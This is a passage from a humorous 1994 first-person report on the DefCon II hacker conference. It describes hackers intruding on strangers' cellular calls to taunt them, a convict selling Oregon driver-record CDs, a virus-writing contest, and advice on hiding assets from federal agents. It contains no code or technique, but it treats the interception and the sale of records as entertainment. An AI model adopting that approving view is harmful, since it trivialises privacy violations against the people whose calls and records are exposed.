  15252. I gotta give it to them: these characters designed and built  the 
  15253. software,  modified  the phones and put it all  together  and  it 
  15254. works!   Not  bad on a $3 allowance and a 10th  grade  education.  
  15255. Now,  I guess what they did may have been sort of illegal, or  at 
  15256. least  highly unethical and definitely  not nice. But I  have  to 
  15257. admit,  some of what I witnessed was very, very, funny.  I'm  not 
  15258. advocating  this  kind of activity, but much like  Candid  Camera 
  15259. broke  into  people's lives to capture their reactions,  cellular 
  15260. hacking  is similarly amusing.   The hacker/phreaks  particularly 
  15261. enjoyed breaking in on fighting couples.  (I counted six  impend
  15262. ing divorces.) Almost without exception the man was in a car  and 
  15263. the lady was at a fixed location; presumably, home. 
  15264.  
  15265. Him: "Where the hell have you been."
  15266. Her:  "Nowhere."
  15267. Him: "Bullshit.
  15268. Her: "Really honey . . ."  Defensively.
  15269. Him: "Who's with you?"  Intense anger.
  15270. Hacker: "Don't believe her.  She's a whore."
  15271. Him: "What was that?"
  15272. Her: "What?"
  15273. "That voice."
  15274. "What voice?"
  15275. Hacker:  "Me you asshole. Can't you see she's playing you  for  a 
  15276. fool."
  15277. "I know she is."  He agrees.
  15278. "What's that honey?"  
  15279. "I know he's there with you."
  15280. "Who?" Incredulous.
  15281. "Him . . . whoever you're fucking when I'm at work." 
  15282. Hacker: "Yeah, it's me."
  15283. "Shit! Who the fuck is there?"
  15284. "No one!"
  15285. "I can hear him, he's there.  You're both making fun of me . . ."
  15286. Hacker: "She's laughing at you, man."
  15287. "No shit.  Who the fuck are you?"
  15288. Hacker: "The guy who takes care of her when you can't, asshole."
  15289. "That's it."  Click.
  15290.  
  15291. Drug dealers aren't immune to these antics.
  15292.  
  15293. "Where's the meet?"
  15294. "By the 7/11 on Tropicana."
  15295. "You got it?"
  15296. "You got the cash?"
  15297. "Yeah, dude."
  15298. "Be sure you do."
  15299. Hacker:  "He  doesn't have the cash my man.  He's gonna  rip  you 
  15300. off."
  15301. "What?"  "What?"  Both sides heard the intruder's voice.  "Who is 
  15302. that?"
  15303. "What's that about a rip-off?"
  15304. "This ain't no rip-off man."
  15305. Hacker: "Yes it is. Tell 'em the truth. You gonna take his  drugs 
  15306. and shoot his ass. Right?  Tell 'em."
  15307. "You gonna rip me off?"
  15308. "No, man!"
  15309. "Your homeboy says you gonna try and rip me off?"
  15310. "What home boy?"
  15311. Hacker:  "Me, you bozo drug freak. Don't you know that  shit  can 
  15312. kill you?"
  15313. Click.
  15314.  
  15315. Good samaritanism pays off upon occasion.
  15316.  
  15317. "Honey, hurry up."
  15318. "I'm on the freeway.  I'm coming."
  15319. Hacker: "He's late.  Let's save her ass."
  15320. "What was that?"  "What did you say honey?"
  15321. "He said he was going to save your ass."
  15322. "Who did?"
  15323. "The guy on the radio."  (Technical ignorance abounds.)
  15324. Hacker:  "Me.  You're late and she's scared so we're  gonna  beat 
  15325. you there and make her safe."
  15326. "Who the hell is that?"  "Who?" "The guy with you?"  "There's  no 
  15327. one here." "He says he's gonna beat me there and pick you up."
  15328. Hacker: "Damn right we are."
  15329. "Hey, this is cool.  Who's there?"
  15330. Hacker: "Cyber Christ talking to you from Silicon Heaven."
  15331. "No shit.  Really?"
  15332. Hacker: "Yeah, (choke, choke,) really."
  15333. "What's happening, honey."
  15334. "I don't know, for sure.  He says it's God."
  15335. "God!?!?"
  15336. Hacker:  "Close enough.  Listen, you sound alright.  Go get  your 
  15337. woman, man  Keep her safe."
  15338. "No problem.  Uh, thanks."
  15339. Click.
  15340.  
  15341. Around 4AM, I guess it was, the hacker/phreaks definitely  helped 
  15342. out law enforcement.  One end of the conversation was coming from 
  15343. inside  a  hotel, maybe even the Sahara. The other  from  another 
  15344. cell phone, most likely in the lobby. 
  15345.  
  15346. "What do you look like?"
  15347. "I'm  five foot nine, thinning brown hair and 180 pounds  I  wear 
  15348. round glasses and  . ."
  15349. "I get the idea. Where are you now?"
  15350. "I'm coming down the elevator now.  What do you look like?"  
  15351. "I'm  six foot one in my heels, have long blond spiked  hair  and 
  15352. black fishnet stockings."
  15353. Hacker: "Don't go man.  It's a bust."
  15354. "What?" he said.
  15355. Hacker:  "Don't go, it's a bust. You don't want your name in  the 
  15356. papers, do ya?"
  15357. "What the fuck?" she yelled.
  15358. "There's a guy who says this is a bust?"
  15359. "Bust? What bust?"
  15360. Hacker: "That's the clue, man.  She's denying it.  Of course it's 
  15361. a bust.  Is it worth a night in jail to not get laid?"
  15362. "Shit."  He whispers not too quietly to another  male  companion.  
  15363. "There's some guy on the phone who says it's bust. What should we 
  15364. do."
  15365. Hacker: "I'm telling you man, don't go,"
  15366. "This ain't worth it. I'm going back upstairs."
  15367. Click.
  15368.  
  15369. A couple of hours later the same hooker was overheard talking  to 
  15370. one of her work mates.
  15371.  
  15372. "Then this asshole says it's a bust.  Cost me $300 in lost  busi
  15373. ness, shit."
  15374. "You,  too?   Same shit been going on all night  long.  What  the 
  15375. fuck?"
  15376.  
  15377. Wow.  And it seems like only this morning that my toilet  explod
  15378. ed. 
  15379.  
  15380.             * * * * *
  15381.  
  15382. So  what's a perfectly groomed and slightly  rotund  50-something 
  15383. convicted methamphetamine dealer doing at DefCon II with hundreds 
  15384. of impressionable teenagers?  You might well ask. 
  15385.  
  15386. So I'll tell you.
  15387.  
  15388. Sitting in yet another Saharan hell-hole of a room they  unabash
  15389. edly market for $55 per night I encountered hackers #1 through #4 
  15390. and  this  . . . I immediately thought, elderly  gent.   He  said 
  15391. nothing  and neither did I, thinking that he might have  been  an 
  15392. over  aged  chaperone  for delinquent teens or  perhaps  even  an 
  15393. understanding Fed.   But the gallon jugs of whiskey was depleting 
  15394. itself right before my eyes, as if a straw from Heaven sucked the 
  15395. manna from its innards.  Actually, it was Bootleg.
  15396.  
  15397. Not bootleg liquor, mind you, but Bootleg the felonious con  from 
  15398. Oregon.  Apparently he got busted 'cause speed is and was against 
  15399. the law, and crank is not exactly the drug choice of maiden aunts 
  15400. nor school marms.  "I've been a hacker longer than some of  these 
  15401. kids  have been alive. It all started back in . . ."   and   Mike 
  15402. "Bootleg" Beketic commenced on the first of hundreds of war-story 
  15403. jail  house tales to entertain him and us.  Bootleg loves a  good 
  15404. story.
  15405.  
  15406. "Jail ain't so bad," he  bragged with a huge whiskey smile.   "No 
  15407. one fucked with me.  You gotta make friends early on.  Then  it's 
  15408. OK."  Good advice, I guess.  "On parole I got slammed with a year 
  15409. for  piss that didn't pass."  Gotta be clean, my man.  Stay  away 
  15410. from that shit.  It'll kill you and your teeth will rot. 
  15411.  
  15412. Bootleg  handed  me  form PROB-37, (Rev. 1/94)  from  the  United 
  15413. States District Court, Federal Probation System.  Grins from  ear 
  15414. to ear.  A badge of honor for villains, thieves, and  scoundrels. 
  15415. Sounds like they need their own union.
  15416.  
  15417. This was the official "Permission To Travel" form dated June  16, 
  15418. 1994 which gave Bootleg the legal right to travel from Oregon  to 
  15419. Las Vegas in the dead of the summer to attend a "computer conven
  15420. tion."   The flight times were specific as were the conditions of 
  15421. his  freedom.   He had to inform the local cops that  he  was  in 
  15422. town.   In  case any crimes occurred throughout the city  of  Las 
  15423. Vegas during his sojourn, he was an easily identifiable suspect.  
  15424.  
  15425. While  he downed another Jack and coke I found out  what  Bootleg 
  15426. was really doing.  Despite the fact that the "Federal Keep  Track 
  15427. of a Crook Travel Form" said, "you are prohibited from  advertis
  15428. ing  or  selling  your DMV  CD,"  the  paranoia that runs rampant  
  15429. through the minds of prison bureaucracy was actually in this case  
  15430. quite correctly concerned. 
  15431.  
  15432. "What's a DMV CD?"
  15433.  
  15434. "I'm glad you asked."  I was set up.  The edict said he  couldn't 
  15435. sell  or  advertise, but there was no provision stating  that  he 
  15436. couldn't answer questions from an inquiring mind.
  15437.  
  15438. Bootleg handed me a CD ROM:
  15439.  
  15440.             Bootleg Presents:
  15441.                  DMV
  15442.  
  15443.         - Over 2 Million Oregon Drivers License Records
  15444.         - Over 3 Million Oregon License Plate Records
  15445.  
  15446. The inside jacket clearly stated that this information was not to 
  15447. be used by any creatively nefarious types for any sort of person
  15448. al Information Warfare tactics.  It warns,
  15449.  
  15450. Do not use this CD to:
  15451.  
  15452.     - Make phony Licenses
  15453.     - Make phony Titles
  15454.     - Obtain phony I.D.
  15455.     - Harass Politicians, Cops or Journalists
  15456.     - Stalk Celebrities
  15457.     - Get ME in trouble <G>
  15458.  
  15459. I  can come up with at least 1001 other uses for this  collection 
  15460. of  information  that the Oregon authorities are none  too  happy 
  15461. about.   The  ones  Bootleg outlined never  came  into  my  mind.  
  15462. (Heh!) Bootleg acquired the information legally.  State officials 
  15463. were kind enough to violate the electronic souls of its  citizens 
  15464. by sending Bootleg their driver's information magnetically embla
  15465. zoned  on  a 3600 foot long piece of 9 track acetate.   Now  they 
  15466. want  to  change the law to reflect "heart felt concern  for  the 
  15467. privacy of their citizens."  Get a clue, or if none's  available, 
  15468. buy one from Vanna.  
  15469.  
  15470. Bootleg  is  moving onto the next 47 states (California  and  New 
  15471. York don't permit this kind of shenanigans) shortly to make  sure 
  15472. that  everyone  has equal access.  Hacking? Of  course.   Bootleg 
  15473. effectively  hacked  the Oregon DMV with their blessing  and  tax 
  15474. payer paid-for assistance. 
  15475.  
  15476. Time  to  go back to my room while Bootleg and friends  spent  an 
  15477. evening  of apparently unsuccessful whoring around the Strip  and 
  15478. Glitter Gulch.
  15479.  
  15480. A good time was had by all.
  15481.  
  15482.             * * * * *
  15483.  
  15484. Jeff  Moss  opened  the Sunday morning session  with  an  ominous 
  15485. sermon.
  15486.  
  15487. "You'll  notice that the wet bar is missing from the  rear?"   It 
  15488. had  been  there yesterday.  Everyone turns around to  look.   "I 
  15489. gotta  pay for the damage . . . "  Jeff was not a  happy  camper.  
  15490. "They  have my credit card number and it's almost full.  So  cool 
  15491. it!" But the show must go on and we had more to learn.
  15492.  
  15493. Next.   Anonymous mailers on the net?  Forget about it.  No  such 
  15494. thing. Anonymous remailers, even if they are in Norway or Finland 
  15495. or some such other country where American information  contraband 
  15496. such  as child pornography is legal, are only as safe and  secure 
  15497. as the people who run it
  15498.  
  15499. "The  FBI can go over any time they want and look up who you  are 
  15500. and  what kinds of stuff you swallow down your  digital  throat," 
  15501. one  speaker  announced.  Of course that's ridiculous.   The  FBI 
  15502. would  have to call in the Boy Scouts or Russian Mafia  for  that 
  15503. kind of operation, but we all knew that anyway.  A slight slip of 
  15504. the ad lib tongue.  No harm done.  
  15505.  
  15506. I  didn't know, until this Sunday, that there were actually  real 
  15507. live versions of "Pump Up The Volume" running rampant across  the 
  15508. country,  impinging their commercial-free low power radio  broad
  15509. casts into an electromagnetic spectrum owned and operated by  the 
  15510. Federal  Communications Commission.  And, as to be expected,  the 
  15511. FCC  is trying to put these relatively harmless stations  out  of 
  15512. business  along with Howard Stern and Don Imus.  One would  think 
  15513. that WABC or KLAC or any other major market stations would little 
  15514. care  if a podunk 20 watt radio station was squeezing in  between 
  15515. assigned  frequencies.  And they probably shouldn't.  But, as  we 
  15516. learned, the Military lent an innocent hand.  
  15517.  
  15518. In  support of the hobbies of servicemen, a local  San  Francisco 
  15519. base commander gave approval for a group of soldiers to establish 
  15520. a small, low power radio station for the base.  Good for  morale, 
  15521. keep the men out of the bars: you know the bit.
  15522.  
  15523. But  the  ballistic missiles went off when the  nation's  premier 
  15524. rating service, Arbitron, listed KFREE as a top local station  in 
  15525. the San Francisco market.
  15526.  
  15527. "What station KFREE?"  "Who the hell are they?"  "What the fuck?"
  15528.  
  15529. Needless to say, KFREE was costing the legitimate radio  stations 
  15530. money  because  advertising rates are based upon  the  number  of 
  15531. listeners not up and peeing during commercials.  Since KFREE  was 
  15532. ad-free,  no contest.  Arbitron assumes the rating to relect  the 
  15533. existence  of  a real station - the numbers are there -  and  the 
  15534. local  stations  call the FCC and the FCC calls the base  and  as 
  15535. quick as you can scream, "Feds suck!" KFREE is off the air.  
  15536.  
  15537. Stomp.
  15538.  
  15539. I  was scheduled to speak today, but with the schedule  seemingly 
  15540. slipping  forward  and backward at  random  haphazard  intervals, 
  15541. there  was  no telling when what would occur.  Mark  Ludwig,  of   
  15542. Virus Writing Contest fame and author of the much touted  "Little 
  15543. Black  Book  of Computer Viruses" Virus gave a less  then  impas
  15544. sioned speech about the evils of government.
  15545.  
  15546. "I know most of you don't have any assets other than your comput
  15547. er,"  Ludwig  said to the poverty stricken masses of  DefCon  II.  
  15548. "But  you will, and you want to make sure the government  doesn't 
  15549. come  crashing down around you whenever they want.  They can  and 
  15550. will  take your life away if it suits them.  There is  no  fourth 
  15551. amendment.   Most  search and seizures are illegal."  And  so  it 
  15552. went. 
  15553.  
  15554. "Put your money off shore, kids," said Dr. Ludwig the theoretical 
  15555. physicist.   "Find a good friendly country with flexible  banking 
  15556. laws and the Feds can't get you."
  15557.  
  15558. "And  when the Feds do come for you, make sure that  your  entire 
  15559. life is on your computer.  Rip up the papers after you scan  them 
  15560. in.   Your all-electronic life cannot be penetrated -  especially 
  15561. if  you get a case of the forgets.  'Oops, I forgot my  password. 
  15562. Oops! I forgot my encryption key.  Oops! I forgot my name.'"
  15563.  
  15564. "Even your VISA and Mastercard accounts should be from  overseas.  
  15565. Keep it out of the US and you'll be all the better for it."   For 
  15566. those interested in such alternative, Ludwig recommends that  you 
  15567. call  Mark Nestman: of LPP Ltd. at 800-528-0559 or  702-885-2509.  
  15568. Tell  him you want to move your millions of rubbles  and  dollars 
  15569. and Cyber-credits overseas for safe keeping because the Byzantine 
  15570. Police are at the front door as you speak.  Order pamphlet 103.
  15571.  
  15572. These  are the defensive measures we can take  protect  ourselves 
  15573. against the emerging Police State.  But offensive action is  also 
  15574. called  for, he says.  "Help Phil Zimmerman.  Send him money  for 
  15575. his  defense.   Then, laugh at the Feds!"  Haha, haha.   Haha.  
  15576. Hahahahahaha.  Ha!
  15577.  
  15578. ."When they come to the door, just laugh at them."  Haha.   Haha
  15579. ha.  Haha.  "No matter what they do, laugh at them."  Hahahahaha.   
  15580. Enough  of  that,  please.  If I laugh at  6  husky  beer-bellied 
  15581. Cyber-cops  who have an arsenal of  handguns pointed at my  head, 
  15582. they  might as well send me to the Group W bench  to  commiserate 
  15583. with  Arlo Guthrie.  Peeing would come before laughing. But  then 
  15584. again,  I'm no longer a grunged out 20 year old who can laugh  in 
  15585. the face of  the Grim Reaper.  "Yes, ossifer, sir.  I'm a  cyber-
  15586. crook.  I ain't laughing at you in your face, ossifer, sir . . ."  
  15587. I panic easily.  Kissing ass well comes from a life long  success 
  15588. of quid pro quo'ing my way from situation to situation. 
  15589.  
  15590. "And, now," Master Mark announced, "on to the results and  awards 
  15591. for  the Annual Virus Writing contest."  Ludwig  seemed  suddenly 
  15592. depressed.   "Unfortunately, we only got one  legitimate  entry."  
  15593. One  entry?   The media plastered his contest across  the  media-
  15594. waves and the National Computer Security Association was planning 
  15595. a  tactical nuclear response.  One entry?  What kind  of  subver
  15596. sives have 20 year olds turned into anyway?  In my day (Yeah, I'm 
  15597. old  enough  to use that phrase) if we called for  a    political  
  15598. demonstration thousands would pile through the subway  turnstiles 
  15599. to  meet a phalanx of well armed police appropriately attired  in 
  15600. riot  gear.  One entry?  Come on X-Generation, you can do  better 
  15601. than  that?   No wonder the world's going to  shit.   Don't  have 
  15602. enough trouble from the young-uns.   Sheeeeeeesssh!
  15603.  
  15604. Mark  Ludwig's  politically incorrect virus writing  contest  may 
  15605. have  been  a  PR success but it was a  business  abortion.   One 
  15606. entry.  Shit.  At the NCSA meeting in Washington,  rivaling  fac
  15607. tions battled over how we as an association should respond.  
  15608.  
  15609. "Hang the bastard."  "He's what's wrong with world."  "Put him in 
  15610. a county jail with Billy-Bob, Jimmy-Ray and Bubba for a week  and 
  15611. they'll be able to squeeze him out between the bars."
  15612.  
  15613. C'mon  you fools! Ignore him! Ignore him! If you don't like  what 
  15614. he has to say don't egg him on. Ignore him.  You want to do  what 
  15615. the  Feds  did to poor Phil Zimmerman and make him a  folk  hero?  
  15616. Turning a non-event into the lead for the evening news is not the 
  15617. way  to  make something go away. I loudly advocated  that  he  be 
  15618. treated  as a non-entity if the goal was reduction to  obscurity.   
  15619. I was right.  
  15620.  
  15621. Super-high priced PR and lobby firms had prepared presentation to 
  15622. wage an all-out attack on Ludwig and his contest.  I bet! And who 
  15623. was going to pay for this?  Peter Tippitt of Semantech ponied  up 
  15624. what  I believe amounted to $7,000 to get the pot going.  No  one 
  15625. else made a firm offer. Can't blame them cause it would have been 
  15626. no  more effective than taking out an ad in Time proclaiming that 
  15627. evil  is bad.  The PR firm would have made their fees, the  event 
  15628. would  have made even more news and Ludwig  would certainly  have 
  15629. had to make a judgement and choose from more than one entry.
  15630.  
  15631. But oddly enough, the one entry did not win.
  15632.  
  15633. The  winner of the Annual Virus Writing Contest was no less  than 
  15634. Bob Bales, Executive Director of the NCSA.  Not that Bob wrote  a 
  15635. program, but if  he had, Ludwig  said, it  would be called either 
  15636. Don Quixote  or Paranoia, and it would be  of the human brain at- 
  15637. tacking Meme type.  The  virus is a software equivalent of Prozac 
  15638. to  alleviate  the  suffering  in  middle-aged males  who have no 
  15639. purpose in life  other than virus busting.  
  15640.  
  15641. "Is Winn Schwartau here?" Mark asked the audience.  
  15642.  
  15643. I was there. "Yo!"  
  15644.  
  15645. "Would you tell Bob that he's won a plaque, and a $100 check  and 
  15646. a  full  year  subscription to the  Computer  Virus  Developments 
  15647. Quarterly."   I'm  the technology advisor to the NCSA so  it  was 
  15648. a natural request to which I was pleased to oblige.
  15649.  
  15650. I  told  Bob about his 15 minutes of fame at DefCon to  which  he 
  15651. roared  in laughter.  "Good! Then I won't have to  subscribe  my
  15652. self."
  15653.  
  15654.  
  15655.  
  15656. I  spoke  next.   Jeff introduced me by  saying,  "Winn  says  he 
  15657. doesn't  want to speak to an empty room so he's gonna talk  now."  
  15658. Some introduction. But, what a great audience!  Better than  most 
  15659. of  the security above-ground starched sphincter tight  suit  and 
  15660. tie  conference audiences I normally get.  But then again, I  get 
  15661. paid  handsomely to address legitimate audiences where I have  to 
  15662. be politically correct.  At DefCon, insulting people was the last 
  15663. thing  I  worried about.  It was what I focused on,  onstage  and 
  15664. off.
  15665.  
  15666. "Hey, kid.  Did you ever land Zimmerman in bed?"  
  15667.  
  15668. "You, you, er . . ."  
  15669.  
  15670. "C'mon kid. Give me your best shot."
  15671.  
  15672. "Your mother . . ."  A crowd gathered to see what kind of  repar
  15673. tee  this little schnook could come up with.  "Your mother ..  ."  
  15674. C'mon  kid.  You  got it in you. C'mon.  "You, she is a   .  .  . 
  15675. uh,  .  . . mother . . ." and he finally skulked  away  in  sheer 
  15676. embarrassment.   Poor kid.  When he went to the men's  room,  men 
  15677. walked out.  Poor kid.  I don't think he ever figured out it  was 
  15678. all a put on.
  15679.  
  15680. The audience got it, though.  Rather than go over what I  rambled 
  15681. about for an hour, here comes a blatant plug: Go buy my new  book 
  15682. "Information  Warfare:  Chaos on  the  Electronic  Superhighway."  
  15683. That'll sum it up real nice and neat.  But what a great audience. 
  15684. Thanks.
  15685.  
  15686. Little did I know, though, that I was also on trial.
  15687.  
  15688. John Markoff of the New York Times was the first to ask, and then 
  15689. a  couple of buddies asked and then a lady asked during  the  Q&A 
  15690. portion of my ad hoc ad lib speech.  "How come you did it?"   Did 
  15691. what?  "How come you flamed Lenny DeCicco?"  
  15692.  
  15693. It  turns  out that someone adapted my  electronic  identity  and 
  15694. logged  on to the WELL in Sausalito, CA and proceeded to  post  a 
  15695. deep  flame  against Lenny.  Among other  none-too-subtle  asper
  15696. sions, 'my' posting accused Lenny of a whole string of crimes  of 
  15697. Information Warfare and even out and out theft. 
  15698.  
  15699. Except,  it wasn't me.  I answered the lady's question with,  "It 
  15700. wasn't me, I don't know Lenny and I don't have an account on  the 
  15701. WELL."    That satisfied everyone except for me.   What  happened 
  15702. and  why?   It seems that Lenny's former partner in  crime  Most-
  15703. Wanted on the lam federal fugitive computer hacker Kevin  Mitnick 
  15704. actually  wrote  and  signed the letter with  his  initials.   Or 
  15705. someone  was spoofing him and me at the same time.  But why?  And 
  15706. why me?
  15707.  
  15708. It took a couple of days after arriving home from DefCon to learn 
  15709. after  extensive conversations with the WELL that my  erased  ac
  15710. count from almost two years ago and then re-erased on June 20  of 
  15711. this  year  was accidentally turned back on  by  some  mysterious 
  15712. administrative process that I cannot claim to fathom.  OK, that's 
  15713. what they said.  
  15714.  
  15715. But perhaps most interesting of the entire Getting Spoofed  inci
  15716. dent  was a single comment that Pei Chen, sysop of the WELL  said 
  15717. to  me  while I complained about how such  an  awful  anti-social 
  15718. attack was clearly reprehensible.  Oh, it's simple, she said.
  15719.  
  15720. "We  have no security."  Whooaaaahhh!  The WELL? No security?   I 
  15721. love  it.   I  absolutely love it.  Major  service  provider,  no 
  15722. security.  Go get 'em cowboy.
  15723.  
  15724. The  only  other speaker I wanted to see was Peter  Beruk,  chief 
  15725. litigator for the Software Publisher's Association.  This is  the 
  15726. Big  Software  Company sponsored organization which  attempts  to 
  15727. privately  interdict illegal software distribution as  a  prelude 
  15728. for both civil and criminal prosecutions.  And with this group of 
  15729. digital anarchists, no less.
  15730.  
  15731. The  SPA scrounges around 1600 private BBS's to see who's  making 
  15732. illicit  copies  of   Microsoft Word or Quattro  For  Weanies  or 
  15733. Bulgarian  for Bimbos or other legitimate software that the  pub
  15734. lishers  would  rather receive their due income from  then  being 
  15735. stolen.
  15736.  
  15737. "Which boards are you on?"
  15738.  
  15739. "That would be telling."  Big grin and laughs.
  15740.  
  15741. "Is your BBS secure?"  A challenge in the making.
  15742.  
  15743. "Sure is."
  15744.  
  15745. "Is that an offer to see if we can break in?"  Challenge made.
  15746.  
  15747. "Ahem, cough, cough." Challenge denied.
  15748.  
  15749. "What  name do you use on the boards?"  Idiot question  that  de
  15750. serves an idiot answer.
  15751.  
  15752. "Fred."  Laughs.
  15753.  
  15754. "You  mean  you have a full time guy to  download  software  from 
  15755. boards to see if it's legal or not?"  "Yup."
  15756.  
  15757. "So,  you pay people to commit felonies?"  Astutely stupid  ques
  15758. tion.
  15759.  
  15760. "We have permission."
  15761.  
  15762. "Why should we have to pay rip-off corporations too much money to 
  15763. use really shitty software?"
  15764.  
  15765. "So don't buy it."
  15766.  
  15767. "We don't.  It's so shitty that it's barely worth stealing."
  15768.  
  15769. "So don't steal it."
  15770.  
  15771. "Just want to check it out, dude."
  15772.  
  15773. "Scum  sucking  imperialists are making all of  the  money.   The 
  15774. software  designers  are getting ripped off by the  big  software 
  15775. bureaucracies.   Power  to the people."   Every  generation  goes 
  15776. through this naively innocent berating of capitalism.  It doesn't 
  15777. make  them  Communists (in 1950 it did), just  not  full  fledged 
  15778. capitalist  pigs themselves yet.  Soon come.  Vis a vis  Ludwig's 
  15779. comment on the asset-deprived audience.  Soon come, man.
  15780.  
  15781. "We go after BBS's that store illegal software."
  15782.  
  15783. "So you're gonna put Compuserve in jail?"  Big, big applause.  
  15784.  
  15785. Despite the openly verbal animosity between the free-ware believ
  15786. ers  and  the Chief Software Cop, the spirited  and  entertaining 
  15787. disagreements  maintained a healthy good natured tone  that  well 
  15788. exceed Peter's time limit, as DefCon II was coming to a close.  
  15789.  
  15790. It was time for one more stand up comedy attempt by a short haired 
  15791. bandanna wearing hippie/hacker/phreak who was not quite up to the 
  15792. job.
  15793.  
  15794. "OK,  guys.   We've had some fun at the  Feds  expense.   They're 
  15795. people, too.  So, from now on, it's Hug a Fed.  Go on, find a fed 
  15796. and go up to him or her and big them a great big bear hug full of 
  15797. love."  The Feds that had been busted were gone.  The ones  still 
  15798. successfully  undercover weren't about to blow it for a quick  feel 
  15799. from a horny teenager.
  15800.  
  15801. Next.   The Cliff Stoll doll with an assortment of accessory  yo-
  15802. yos  was a popular item. It was thrown pell-mell into the  crowds 
  15803. who  leapt at it with a vengeance like a baseball bleachers  sec
  15804. tion awaiting the 61st home run.
  15805.  
  15806. "There  used to be a Wife of Cliff Stoll doll, but no one's  seen 
  15807. it  in two years."  Cliff is strange.  I don't know if he's  that 
  15808. strange, but it was a funny bit.
  15809.  
  15810. "Then  we have the LoD/MoD action figure set starring Erik  Bloo
  15811. daxe  and  Phiber Optik."  GI Joe action  set  gone  underground.  
  15812. Corny,  but appreciated as hundreds of bodies dove to  catch  the 
  15813. plastic relics tossed from the stage.
  15814.  
  15815. If anything, an anti-climatic end to an otherwise highly informa
  15816. tive  and  educational conference.  I can hardly wait  till  next 
  15817. year  when, after word gets out, DefCon III will be  attended  by 
  15818. thousands  of hackers and cops and narks who will try to  replay   
  15819. the Summer of Cyber-Love '94 for a sequel.
  15820.  
  15821.             * * * * * 
  15822.  
  15823. More  than anything I wanted to get away from the  Sahara.   Away 
  15824. from  its nauseatingly chromatic carpets, it's hundreds  of  sur
  15825. veillance  cameras,  and  most of all, away  from  its  exploding 
  15826. toilets.  
  15827.  
  15828. We decided to play, and play we did at the new Luxor Hotel  which 
  15829. is an amazing pyramid with 4000+ rooms. There are no elevators as 
  15830. in  a pyramid 'going up' is kind of useless, so Inclinators  take 
  15831. passengers  up  the  30 some odd floors to  hallways  which  ring 
  15832. around the impossibly huge hollowed out pyramid shaped atrium.
  15833.  
  15834. This was play land.  And for three hours we played and played and 
  15835. went  to dumb shows that attract mid-western mamas  from  Noodnick, 
  15836. Kentucky, alighting in Vegas  for their annual RV pilgrimage. But  
  15837. we went and enjoyed none the less. 
  15838.  
  15839. The "Live TV" show was anything but live except for lovely  Susan 
  15840. who  hosted  us into the ersatz TV station.  Her job is  to  look 
  15841. pretty,  sound pretty and warm up the crowd for an  over  budget, 
  15842. overproduced schmaltz driven video projection that was to make us 
  15843. all  feel like we were on stage with Dave.  Letterman,  that  is.  
  15844. The effect does not work.  But we enjoyed ourselves, anyway.
  15845.  
  15846. "Everyone here on vacation?"
  15847.  
  15848. "No!" I yelled out.  Poor Susan was stunned.  No?  Why else would 
  15849. you be here?
  15850.  
  15851. "What  are  you doing?"  The TV audience of 500 was  looking  our 
  15852. way.   Between the five of us we had a million dollars  (give  or 
  15853. take) of electronic wizardry stuffed around us, beneath us and in 
  15854. our laps.  
  15855.  
  15856. "Working." Gee, I'm quick.
  15857.  
  15858. "What  do you do?"  Susan asked with a straight face.  I bet  she 
  15859. expected something like gas pumper, or nocturnal mortuary  forni
  15860. cator or 7/11 clerk.
  15861.  
  15862. "We're hacking for Jesus.  This is Cyber Christ!" I said pointing 
  15863. at Erik Bloodaxe.
  15864.  
  15865. Silence.  Dead silence again.  Sleep with Phil Zimmerman silence.  
  15866. Except for us.  We giggled like school boys.  Psyche.
  15867.  
  15868. "Ah,  .  . . that's nice." That was all she could come  up  with: 
  15869. That's  nice.   So  much for ad libbing  or  deviating  from  the 
  15870. script.   But  the TV audience enjoyed it.  A  whole  lot.   They 
  15871. finally  figured out it was put on.  Not every one from the  Mid-
  15872. West is as stupid as they all pretend to be.
  15873.  
  15874. Then  it was time to get sick.  VR rides do me in, but not to  be 
  15875. publicly  humiliated by my 20-something cohorts (and  Mike  Peros 
  15876. with  whom I had to travel yet another 2000 miles that  night)  I 
  15877. jumped right into an F-14 simulator which rotated 360 degrees  on 
  15878. two gimbals for an infinite variety of nauseousness.
  15879.  
  15880. "Oh, shit!" I yelled as I propelled myself forward and around and 
  15881. sideways with sufficient g-force to disgorge even the most delec
  15882. table meal.  "Oh, shit." I had reversed the throttle and was  now 
  15883. spinning  end  over end backwards.  My inner ear was  getting  my 
  15884. stomach  sick. "Oh, shit."  Out of the corner of my eyes my  four 
  15885. pals  were  doubled over in laughter.  Had I barfed yet  and  not 
  15886. known it?  God, I hope not.  "Oh, shit." I came to a dead  stand
  15887. still,  the video screen showed me plummeting to earth at  escape 
  15888. velocity and I pushed the throttle forward as roughly as I could.  
  15889. An  innate survival instinct came in to play.  "Oh,  shit!"   The 
  15890. virtual  aircraft  carrier  came into sight and  after  almost  2 
  15891. minutes of high speed rotating revulsion, I was expected to  land 
  15892. this  spinning F-14 on a thimble in the ocean.  Right.  I  tried, 
  15893. and damned if I didn't make it.  I have no idea how, but I got an 
  15894. extra  34,000  points  for a safe  landing.  120  seconds.  Ding.  
  15895. Time's up.
  15896.  
  15897. I got out of the simulator and spilled right onto the floor;  one 
  15898. 42  year old pile of humanity who had navigated nausea but  whose 
  15899. balance  was  totally beyond repair. "Could anyone  hear  me?"  I 
  15900. asked from my knees.
  15901.  
  15902. "They were selling tickets."
  15903.  
  15904. "Do I get my money back?"
  15905.  
  15906. Onto  the  VR race cars.  I really thought I'd throw  up  to  the 
  15907. amusement  of a thousand onlookers. Hacking then  phreaking  then 
  15908. flying  and  now  driving.   I put the pedal  to  the  metal  and 
  15909. crashed.  The huge video display has me tipping end over end  and 
  15910. the  screen  is  shaking and the car I'm  driving  is  shuddering 
  15911. violently but my brain can't compute it all.  I'm gonna wretch, I 
  15912. just  know  it.  But I keep on driving,  decidedly  last  against 
  15913. people  who haven't been handicapped with an inner ear so  sensi
  15914. tive I get dizzy when I watch a 5" black and white TV.
  15915.  
  15916. We  tilted out of there and alas, it was time to find  a  200,000 
  15917. pound of metal to glide me home. It was a damn good thing I hadn't 
  15918. eaten  before VR Land, but I wolfed down $3 hot dogs at the  air
  15919. port  knowing  full well that whatever they served on  the  plane 
  15920. would be a thousand times worse.  So Mike and I munched,  leaving 
  15921. Cyber Christ and friends to battle the press and the stars at the 
  15922. opening of Planet Hollywood at Caesar's Palace.
  15923.   
  15924. And then an unexpected surprise. Lisa and friend; our first class 
  15925. objects of flirtation from the outbound trip which seemed like  a 
  15926. month ago, appeared.  But we were all so wiped out that a  conti
  15927. nent of innuendo turned into a series of short cat naps.  We  got 
  15928. a  few  flirts  in,  but nothing to write home  about.  Red  Eye   
  15929. flights are just not what they're cracked up to be.  
  15930.  
  15931. As  I  crawled into bed at something like 7AM  Eastern,  my  wife 
